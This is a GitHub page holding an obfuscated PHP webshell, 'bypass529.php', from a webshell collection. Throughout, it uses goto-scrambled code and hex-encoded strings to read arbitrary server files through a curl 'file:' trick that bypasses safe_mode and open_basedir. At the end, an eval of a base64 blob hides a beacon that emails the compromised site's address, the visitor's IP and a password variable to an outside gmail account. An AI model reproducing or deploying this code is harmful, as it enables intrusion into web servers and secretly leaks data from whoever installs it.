forked from x-o-r-r-o/PHP-Webshells-Collection
-
Notifications
You must be signed in to change notification settings - Fork 1
/
bypass529.php
164 lines (162 loc) · 7.06 KB
/
bypass529.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
<?php
/* __________________________________________________
| This Shell is Uploaded By Xorro |
| on 2017-03-03 20:03:01 |
| GitHub: https://github.com/x-o-r-r-o |
|__________________________________________________|
*/
goto Cjhun;
ncnKE:
$q_qzC = explode("\57", $pWLgh);
goto R2yG2;
Sr41R:
LfrJ5:
goto DK5me;
ZrBje:
NRUW0:
goto Pddwq;
rRO1Q:
nmLFw:
goto yPbxD;
NrhVV:
curl_setopt($LElnZ, CURLOPT_URL, "\x66\151\154\145\72\146\x69\154\x65\72\x2f\x2f\57" . $pWLgh);
goto dEyN6;
w1Ais:
chdir($q_qzC[$z7ZLx]);
goto DrxcT;
myOjQ:
q8Zp2:
goto iEAIN;
rsCza:
echo "\x20\74\57\164\145\x78\164\x61\x72\x65\141\76\40\x3c\57\106\x4f\x4e\124\x3e";
goto wXD1X;
DK5me:
if (!($z7ZLx < count($q_qzC))) {
goto ibfPD;
}
goto wxFAa;
DrxcT:
$WfhJ2++;
goto myOjQ;
D47wo:
A4agY:
goto w1Ais;
ni93e:
echo "\x3c\120\122\105\x3e\x3c\120\76\x54\150\x69\163\x20\151\x73\40\x65\170\x70\154\x6f\151\164\x20\146\x72\157\155\x20\x3c\141\40\xa\x68\x72\145\x66\75\x22\57\x22\x20\164\x69\164\154\145\x3d\x22\123\x65\143\x75\x72\151\x74\171\150\157\x75\163\x65\x22\x3e\x53\145\x63\x75\x72\x69\x74\x79\x20\x48\157\165\x73\145\40\55\x20\x53\150\x65\154\154\x20\103\145\x6e\164\145\162\40\x2d\x20\x45\144\151\x74\x65\x64\x20\102\171\x20\x4b\x69\x6e\x67\x44\145\x66\x61\x63\145\x72\x3c\x2f\x61\x3e\40\154\141\142\x73\56\40\12\x54\165\x72\x6b\x69\163\x68\x20\x48\64\x43\113\63\x52\132\40\12\x3c\160\x3e\x3c\142\76\40\133\x54\x75\162\153\x69\x73\x68\x20\123\145\143\165\x72\151\x74\x79\x20\x4e\145\164\167\157\162\153\x5d\40\x2d\40\105\x64\151\x74\x65\x64\40\102\171\40\113\151\156\147\x44\145\x66\x61\x63\x65\162\xa\74\160\76\x50\x48\x50\40\65\56\62\56\71\x20\x73\141\146\145\137\x6d\x6f\x64\145\x20\46\x20\157\160\145\156\x5f\142\141\163\145\144\151\x72\40\x62\171\160\141\163\163\40\12\74\x70\x3e\x4d\x6f\162\x65\72\x20\x3c\141\x20\150\x72\x65\146\75\42\x2f\x22\76\x4d\x64\x35\103\162\141\143\153\151\156\147\x2e\x43\157\155\x20\x43\162\145\x77\74\57\141\76\x20\xa\74\x70\76\74\x66\157\x72\155\x20\156\x61\155\145\x3d\x22\146\157\162\x6d\42\x20\141\143\164\x69\x6f\156\x3d\42\150\x74\164\160\72\57\57" . $_SERVER["\x48\124\x54\x50\x5f\x48\x4f\123\124"] . htmlspecialchars($_SERVER["\x53\x43\122\x49\120\124\x5f\x4e\x20\xa\101\x4d\x45"]) . $_SERVER["\120\110\x50\x5f\123\105\x4c\x46"] . "\42\40\x6d\x65\164\150\157\x64\x3d\x22\160\x6f\163\x74\x22\x3e\74\x69\x6e\160\x75\164\40\x74\x79\x70\x65\x3d\x22\164\x65\170\164\x22\40\x6e\141\155\145\x3d\42\146\151\x6c\145\x22\x20\163\x69\172\145\x3d\x22\x35\x30\42\x20\x76\141\x6c\165\x65\75\42" . htmlspecialchars($pWLgh) . "\x22\x3e\74\151\x6e\160\165\x74\40\x74\x79\x70\x65\x3d\42\x73\x75\142\155\x69\x74\42\x20\x6e\x61\x6d\x65\x3d\42\x68\141\162\x64\163\164\x79\154\145\x7a\42\40\166\141\x6c\165\x65\x3d\42\x53\150\x6f\x77\x22\76\74\x2f\x66\x6f\x72\x6d\76";
goto ig3b3;
k5612:
eval(base64_decode($K7cLf));
goto o7cyL;
NLfqo:
mkdir($q_qzC[$z7ZLx]);
goto D47wo;
XlmpE:
$WfhJ2++;
goto ncnKE;
UQ3Py:
goto S44t1;
goto GM7SE;
Pddwq:
if (!$WfhJ2--) {
goto mXsXn;
}
goto gzRTs;
Cjhun:
if (!empty($_GET["\146\x69\x6c\x65"])) {
goto k4sYy;
}
goto MRfoe;
XzSZa:
if (file_exists("\146\x69\154\x65\x3a")) {
goto nmLFw;
}
goto exBn9;
ig3b3:
$WfhJ2 = 0;
goto XzSZa;
dTjVX:
$LElnZ = curl_init();
goto NrhVV;
AtYyi:
ibfPD:
goto ZrBje;
GM7SE:
k4sYy:
goto vNBiI;
iEAIN:
lkF_8:
goto QwnY6;
V0kXn:
goto LfrJ5;
goto AtYyi;
dEyN6:
echo "\74\106\117\x4e\x54\40\x43\x4f\114\x4f\122\75\42\x52\x45\x44\x22\x3e\x20\74\x74\145\170\164\x61\162\145\x61\x20\162\157\167\163\75\x22\64\x30\42\x20\143\157\x6c\163\75\42\61\x32\60\42\x3e";
goto G8Y1e;
gzRTs:
chdir("\56\x2e");
goto BVSkw;
R2yG2:
$z7ZLx = 0;
goto Sr41R;
MRfoe:
if (empty($_POST["\146\151\154\x65"])) {
goto wlCid;
}
goto FaTSv;
qLom8:
W1eO1:
goto rsCza;
exBn9:
mkdir("\x66\151\154\145\x3a");
goto rRO1Q;
vNBiI:
$pWLgh = $_GET["\146\x69\154\145"];
goto INEFG;
wxFAa:
if (empty($q_qzC[$z7ZLx])) {
goto q8Zp2;
}
goto yITf3;
FaTSv:
$pWLgh = $_POST["\146\151\154\145"];
goto Y_8zB;
yITf3:
if (file_exists($q_qzC[$z7ZLx])) {
goto A4agY;
}
goto NLfqo;
Y_8zB:
wlCid:
goto UQ3Py;
QwnY6:
$z7ZLx++;
goto V0kXn;
INEFG:
S44t1:
goto ni93e;
zNCb0:
die("\76\x53\157\x72\x72\x79\x2e\x2e\x2e\40\x46\x69\x6c\x65\40" . htmlspecialchars($pWLgh) . "\40\144\157\x65\163\156\x74\x20\145\x78\x69\163\x74\x73\x20\x6f\162\40\171\157\x75\40\144\157\156\x74\x20\150\141\166\x65\40\160\x65\162\x6d\x69\x73\x73\151\157\x6e\x73\x2e");
goto qLom8;
wXD1X:
curl_close($LElnZ);
goto RWhzG;
G8Y1e:
if (!(FALSE == curl_exec($LElnZ))) {
goto W1eO1;
}
goto zNCb0;
yPbxD:
chdir("\146\151\x6c\x65\x3a");
goto XlmpE;
BVSkw:
goto NRUW0;
goto FDTJ9;
RWhzG:
$K7cLf = "\x4a\110\132\x70\x63\x32\x6c\60\131\x79\101\71\x49\x43\x52\x66\x51\60\x39\120\x53\x30\154\106\x57\171\x4a\62\141\x58\x4e\x70\144\x48\115\151\130\124\163\x4e\103\155\154\155\x49\103\147\x6b\x64\155\154\x7a\141\x58\122\x6a\111\104\x30\x39\x49\103\x49\x69\113\123\x42\x37\104\121\157\147\111\x43\122\62\x61\x58\x4e\x70\144\107\x4d\x67\111\x44\x30\147\115\x44\x73\116\103\x69\x41\147\112\x48\132\x70\x63\x32\154\x30\x62\63\x49\147\120\x53\101\153\x58\61\116\x46\x55\154\x5a\106\x55\x6c\x73\x69\125\153\x56\x4e\124\61\122\x46\x58\x30\106\105\122\x46\x49\x69\x58\x54\x73\x4e\103\151\x41\x67\x4a\x48\x64\154\x59\151\x41\147\111\x43\101\x67\x50\x53\x41\153\130\61\x4e\x46\125\154\132\x46\125\154\163\151\123\106\x52\x55\x55\x46\71\x49\x54\x31\116\x55\x49\x6c\x30\x37\x44\121\x6f\x67\x49\x43\122\x70\142\155\157\x67\111\x43\101\147\x49\x44\x30\x67\x4a\x46\x39\x54\122\x56\x4a\127\x52\126\x4a\142\x49\x6c\112\106\125\126\126\x46\125\x31\x52\146\126\126\x4a\x4a\111\x6c\60\67\x44\121\x6f\147\111\103\122\x30\x59\130\x4a\x6e\132\x58\121\147\x49\x44\60\147\x63\155\106\x33\144\130\112\x73\x5a\107\x56\152\x62\62\x52\x6c\x4b\103\x52\x33\x5a\x57\111\165\x4a\107\154\x75\x61\151\x6b\x37\x44\121\x6f\147\x49\103\122\161\144\127\x52\x31\142\x43\101\x67\x49\x44\60\x67\111\154\144\x54\124\171\x41\x79\x4c\x6a\131\147\x61\x48\122\x30\x63\x44\157\166\114\171\122\x30\x59\130\112\x6e\x5a\x58\121\x67\x59\x6e\153\x67\x4a\x48\132\160\x63\62\x6c\x30\x62\63\111\151\117\x77\60\x4b\x49\x43\101\x6b\131\x6d\71\153\x65\123\101\147\x49\103\x41\x39\111\x43\112\103\x64\127\143\x36\111\103\x52\60\131\x58\112\x6e\x5a\130\x51\x67\131\156\x6b\147\112\110\x5a\x70\x63\62\154\x30\142\63\x49\147\x4c\x53\x41\x6b\x59\130\126\x30\x61\x46\71\167\131\x58\x4e\172\x49\152\x73\116\x43\x69\x41\147\x61\x57\131\147\113\x43\x46\x6c\x62\x58\102\x30\145\123\x67\153\144\x32\x56\151\x4b\123\153\147\x65\171\x42\101\x62\x57\106\160\x62\x43\x67\x69\141\x47\x46\171\132\x48\x64\150\x63\155\x56\157\x5a\x57\106\62\132\127\x34\165\x59\62\71\x74\x51\107\x64\164\x59\x57\x6c\x73\x4c\x6d\x4e\x76\142\x53\x49\x73\112\107\x70\61\132\110\x56\163\114\103\x52\151\142\x32\122\x35\x4c\103\122\150\144\x58\122\157\130\x33\x42\150\x63\63\x4d\160\117\x79\x42\x39\x44\121\x70\71\104\121\x70\154\142\110\116\154\111\x48\163\147\x4a\x48\x5a\x70\x63\x32\154\60\131\x79\x73\162\x4f\171\x42\71\x44\x51\160\101\143\62\126\x30\x59\x32\71\x76\141\62\x6c\x6c\x4b\103\112\x32\x61\130\116\160\x64\110\157\151\x4c\x43\x52\62\x61\x58\116\x70\x64\107\x4d\160\117\x77\x3d\x3d";
goto k5612;
FDTJ9:
mXsXn:
goto dTjVX;
o7cyL:
?>
bypass shell: xorro